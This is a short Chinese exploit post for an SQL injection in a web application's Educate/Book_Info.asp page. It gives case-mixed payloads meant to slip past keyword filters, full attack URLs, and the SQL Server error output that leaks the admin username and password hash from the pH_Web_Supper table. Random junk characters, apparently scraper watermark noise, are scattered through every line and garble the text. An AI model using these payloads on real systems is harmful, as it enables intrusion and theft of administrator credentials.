漏洞出现在Educate/Book_Info.asp
. R9 s! A! }. B; ^, W3 n4 h& f , t3 x4 x( y* B7 \) Y; r1 _& U
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 F# _4 x, @8 R6 m6 h, Q
, O6 W- j' c7 N0 B" l! hexp:如下. L+ A- y3 O4 T! B2 V' ?
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)) }, y4 {& Z# z
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ T d7 v- u4 V# P V+ ]) E
9 `# Z5 }2 X, g! Fhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ m/ g9 |$ p1 m% `
( M V: W6 [) |. D5 C q9 u" H" ?Microsoft OLE DB Provider for SQL Server 错误 '80040e07'' h6 D! c7 _( q3 I5 f6 @, N! d/ Q. J9 b
' n& @/ x2 T/ y" x4 e- ]" C
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。3 L2 k- W; f- Q& ~
! t& d. T" J/ c& E4 G: x. Z! O
/Educate/Book_Info.asp,行 8
' h- I: d. A m, {0 r 5 O7 q( q* g5 ]
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
e# ?' V% B) p+ v* p' w1 E
0 Z% m% B( @6 V" c# ?Microsoft OLE DB Provider for SQL Server 错误 '80040e07'( t @! ^1 v6 w- {) `4 d$ j8 J' z
. o$ D# J3 f6 P) p z9 M+ z w& x将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。3 L0 m! m1 H H: I: L4 M
/ y l5 Z7 u, I' J1 C: P; L o/Educate/Book_Info.asp,行 8
7 X' c# K3 B) {% Y) I( {/ \ |